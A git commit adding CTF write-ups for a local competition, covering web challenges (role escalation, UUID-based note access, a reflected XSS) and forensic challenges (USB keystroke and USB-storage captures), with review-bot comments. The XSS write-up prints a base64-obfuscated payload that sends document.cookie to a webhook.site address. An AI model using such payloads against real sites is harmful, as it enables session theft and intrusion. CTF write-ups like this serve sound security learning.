feat: added CTF Secur{i}e The System

pull/15/head
daffainfo 2023-12-18 22:22:24 +07:00
parent 9caf4fc230
commit 05bc688da1
27 changed files with 177 additions and 1 deletions

@ -0,0 +1,33 @@
# Notes Manager
> You are a penetration tester hired by a small company who got their website hacked recently. They said the hacker somehow got administrative privilege to the website, but there were no logs indicated that an our main admin account was used in other IP Address else than our administrator IP Address. Can you help this company to find the vulnerabilities so that they can patch it ASAP?
## About the Challenge
We were given a website without a source code, and there are some functionality such as:
* Register
* Login
* Setting acount
* Create our note
* See our note
* Lock our note
![flag](images/preview.png)
## How to Solve?
To obtain the flag, we need to first change our role from `user` to `admin` in the settings menu. (When I solved this challenge, the author accidentally added a `role` parameter to the account settings form)
![form](images/form.png)
After obtaining the `admin` role, we need to check the locked note that contains the flag.
![flag-notes](images/flag-notes.png)
We can bypass it by accessing the note directly (There is a note UUID in the body).
![form](images/uuid.png)
![flag](images/flag.png)
```
STS23{Bl4ckb0x_Ch4ll_F0r_An0th3r_D4y}
```
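
Review bot: the last step, "We can bypass it by accessing the note directly (There is a note UUID in the body)", does not say which response body exposes the UUID or which request returns the locked note, so the second finding cannot be reproduced or patched from the text alone. The brief asks for the vulnerabilities so they can be patched, so name both: the account settings form accepts a client-supplied `role` value, and a locked note can be read by requesting it directly by its UUID. Add one line on each fix (drop `role` from the settings request on the server side, and enforce the lock check on the note endpoint as well as in the list view). Smaller points: `Setting acount` has a typo, and the alt texts do not match the images (`![flag](images/preview.png)`, `![form](images/uuid.png)`).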

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

@ -0,0 +1,10 @@
# CTF Secur{i}e The System
CTF writeup for The CTF Secur{i}e The System. I took part in this CTF competition with my friend (Duo) and secured the 7th place out of 40 teams
| Category | Challenge |
| --- | --- |
| Forensic | [keylogger](/CTF%20Secur{i}e%20The%20System/keylogger/)
| Forensic | [pemanasan](/CTF%20Secur{i}e%20The%20System/pemanasan/)
| Forensic | [sloppy](/CTF%20Secur{i}e%20The%20System/sloppy/)
| Web Exploitation | [Notes Manager](/CTF%20Secur{i}e%20The%20System/Notes%20Manager/)
| Web Exploitation | [UREL-EX2S](/CTF%20Secur{i}e%20The%20System/UREL-EX2S/)
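
Review bot: the links percent-encode spaces but leave the braces raw (`/CTF%20Secur{i}e%20The%20System/keylogger/`); encode them as `%7B` and `%7D` so the path does not depend on how a renderer treats `{` and `}`. The table rows also have no closing `|`, unlike the event tables changed later in this commit, and the intro sentence runs straight into the header row; add the closing pipes and a blank line before the table. The intro, "CTF writeup for The CTF Secur{i}e The System", repeats "CTF" and "The".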

@ -0,0 +1,40 @@
# UREL-EX2S
> Have you heard the exciting news? The little princess has just created a website for fellow GT fans to connect and chat! Before the official launch, we want to ensure a secure experience for everyone. Could you help us by testing it for potential XSS vulnerabilities? We want to make sure her fans don't encounter any issues with data security, especially from those pesky Android robots.
## About the Challenge
We were given a source code (You can download the source code [here](dist.zip)) and the website. The source code is actually quite simple; there's no crazy controller, complicated structure, etc.
![preview](images/preview.png)
## How to Solve?
There's an interesting thing in the 404 page, when I input a random string in the URL (Ex: http://example/ddd). Our input reflected in the source code
![404](images/404.png)
I can close the tag by adding a quote in the url, and then I tried to use `<` and `>` to create a new HTML tag but the website encoded our input
![quote](images/quote.png)
Because of the bot doesn't interact with the inputted url, We need to find a way to make the XSS payload executed without user interaction and I found this [tweet](https://twitter.com/RenwaX23/status/1122606900154130432)
Yayyy, so I tried to create a XSS payload again based on the tweet above, and there's an alert xD
![alert](images/alert.png)
```
http://app:8080/ddd'onfocus='alert(12)'name='jj#jj
```
More or less, the final payload looks like this
```
http://app:8080/ddd'style='x'onfocus='eval(atob(this.id))'id='d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vd2ViaG9vay5zaXRlLzU1YWY3MzI2LWI5OTYtNGNjYS05OWM1LWM3ZmMzYzNhN2Y4My8/Jytkb2N1bWVudC5jb29raWUp'name='jj#jj
```
Input the payload to the bot form, and then check webhook.site to get the flag
![flag](images/flag.png)
```
STS23{xss_in_url_path!you_must_be_kidding_right?}
```
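
Review bot: the final payload carries its whole script as a base64 string in `id='...'`, and the text never says what that string decodes to, so the reader has to decode it to learn what the bot is made to do. Show the decoded statement in prose and replace the endpoint inside it with a placeholder such as `<your-webhook-url>` rather than publishing the one used during the event. The root cause is also left to the screenshots: state which attribute the URL path is reflected into on the 404 page and that `<` and `>` are encoded while the single quote is not, then add a line on the fix (encode quotes for the attribute context). The first payload block sits after the sentence about the alert with no lead-in, and the example host switches from `http://example/ddd` to `http://app:8080`.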

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

@ -0,0 +1,27 @@
# keylogger
> So, here's the thing. I just came to the Internet caffee (warnet) and after several minutes using the computer, I found a strange process running in the backround. Then i found out it was a keylogger. Luckily I can stop the process and don't let the attacker get this keylogger file. Because i just logged in to my server before.
> flag = STS23{`<my server password>`}
## About the Challenge
We were given a pcapng file (You can downlod the file [here](log.pcapng)) and we need to find the flag inside this packet capture file
![preview](images/preview.png)
## How to Solve?
Im using this [writeup](https://ctftime.org/writeup/27675) as a reference because they have the same solution method. First filter the data first to get the usbhid data
```
((usb.transfer_type == 0x01) && (frame.len == 35)) && !(usb.capdata == 00:00:00:00:00:00:00:00)
```
And then put this filter into this [repository](https://github.com/WangYihang/UsbKeyboardDataHacker) to convert the usbhid data into a character and voila!
![flag](images/flag.png)
> `<DEL>` means we need to delete the character
```
STS23{th1smys3cretp@ssw0rd}
```
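
Review bot: "put this filter into this repository" skips a step: the line above it is a Wireshark display filter, and the text does not say how it reaches UsbKeyboardDataHacker (an exported, filtered capture, or a change to the script itself). Add the exact command you ran. Also state which characters the `<DEL>` markers removed to get from the tool output to the final flag, since `images/flag.png` is the only record of the raw output. Wording: `downlod`, `Im`, and "First filter the data first".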

Binary file not shown.

Binary file not shown.

Binary file not shown.

@ -0,0 +1,22 @@
# pemanasan
> Is that a `qrcode`? why is it so big?
## About the Challenge
We were given a rar file (You can downlod the file [here](pemanasan.rar)). Inside the file, there were 2 files which is `whatistheDIFFerent` (Contain the diff between the new qr and old qr image) and we got `qr.new`. If we parse the qr new we got `Lorem ipsum ....` string
![preview](images/preview.png)
## How to Solve?
Use `patch` command and then parse the QR code again to obtain the flag
```bash
$ patch qr.new -i whatistheDIFFerent
patching file qr.new
Reversed (or previously applied) patch detected! Assume -R? [y] y
```
![flag](images/flag.png)
```
STS23{really_big_qr_isnt_it}
```
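
Review bot: the transcript shows `patch` stopping at "Reversed (or previously applied) patch detected! Assume -R? [y] y", but the text only says "Use `patch` command", so the reader is not told that the diff is being applied to `qr.new` in reverse. Say so and give the non-interactive form, `patch -R qr.new -i whatistheDIFFerent`. The fence is tagged `bash` but holds a prompt plus program output, and the tool used to "parse the QR code" is never named. Wording: "2 files which is" and `downlod`.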

Binary file not shown.

Binary file not shown.

Binary file not shown.

@ -0,0 +1,39 @@
# sloppy
> So, I found an USB in my class, I took it and I put it in my laptop. Then i found interesting anime (the anime is in mp4) and rar file and I copied it on my laptop. When i tried to open the file it showed pop up that my computer has been comprimized and my laptop restared after 1 minutes and I immediately remove all file that've been copied to my computer. As an engineer i always capture usb traffic using wireshark. Please help me to figure out what's happening in my laptop.
> [download](https://drive.google.com/file/d/1JFQ2p1tRGp_s1rrHWX6glHP2r4nftjR7/view?usp=sharing)
> wrap your flag with STS23{`<value>`}
## About the Challenge
We were given a pcapng file (You can download the file using the link above), and we need to find the flag inside the packet capture file
![preview](images/preview.png)
As you can see, there are USB and USBMS protocol in the packet capture file
## How to Solve?
As we can see, there are a loot of usbms protocol and the author mention about "rar" file. So im using this command to extract every file and then put it into a JSON file
```bash
tshark -T json -x -Y usbms -r chall.pcapng > usbms.json
```
And then I tried to find a rar file using `grep` command (Rar! == 52617221)
```bash
cat usbms.json | grep '"52617221'
```
Okay we found it, and then I submitted the hex code into CyberChef
![Alt text](image.png)
As you can see, there is a file with a `.bat` extension—hmm, weird. If you analyze the RAR file, this is the payload for `CVE-2023-38831`. And then I extracted the bat file and submitted into a sandbox malware online platform
![Alt text](image-1.png)
```
STS23{C0mPrem1zed_d3sktop_h3h3}
```
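
Review bot: the writeup goes from "submitted into a sandbox malware online platform" straight to the flag without saying where in the sandbox result the flag value appears; add that last step in text, since `image-1.png` is the only evidence. The `grep '"52617221'` step only locates the packet where the archive starts, so say whether the whole RAR sat in that one hex field or how the following packets were joined before CyberChef, and which CyberChef recipe was used. `cat usbms.json | grep ...` can be `grep ... usbms.json`, and the two screenshots use `image.png` and `image-1.png` with "Alt text" while the other writeups in this commit use `images/` and a descriptive alt.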

Binary file not shown.

Binary file not shown.

Binary file not shown.

@ -128,11 +128,16 @@ List of CTF events that i have joined before
| NewportBlakeCTF 2023 | Yes | [Link](/NewportBlakeCTF%202023/) |
| Hackappatoi CTF '23 | No | - |
| pingCTF 2023 | Yes | [Link](/pingCTF%202023/) |
| The Cyber Cooperative CTF | Yes | - |
| BackdoorCTF 2023 | No | - |
| 1st Annual TCM Invitational CTF | No | - |
| niteCTF 2023 | Yes | - |
### Local Events
| Event Name | Writeup Available? | Writeup Link |
| ---------- | ------------------ | ------------ |
| Cyber Jawara 2023 - Umum | No | [Link](/Cyber%20Jawara%202023%20-%20Umum/) |
| CTF Secur{i}e The System | Yes | [Link](/CTF%20Secur{i}e%20The%20System/) |
| Cyber Jawara 2023 - Umum | Yes | [Link](/Cyber%20Jawara%202023%20-%20Umum/) |
| Information and Technology Festival 2023 | No | - |
| 0ByteCTF 2023 | Yes | [Link](/0ByteCTF%202023/) |
| N45HTCTF2023 2023 | No | - |
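
Review bot: the rows for "The Cyber Cooperative CTF" and "niteCTF 2023" say `Yes` in the availability column but have `-` as the link; either add the links or set them to `No` until the writeups land. The new `CTF Secur{i}e The System` link leaves `{` and `}` unencoded next to `%20`; use `%7B` and `%7D`. With the +/- markers lost in this view, "Cyber Jawara 2023 - Umum" shows up twice (`No` and `Yes`); confirm that only the `Yes` row remains in the file.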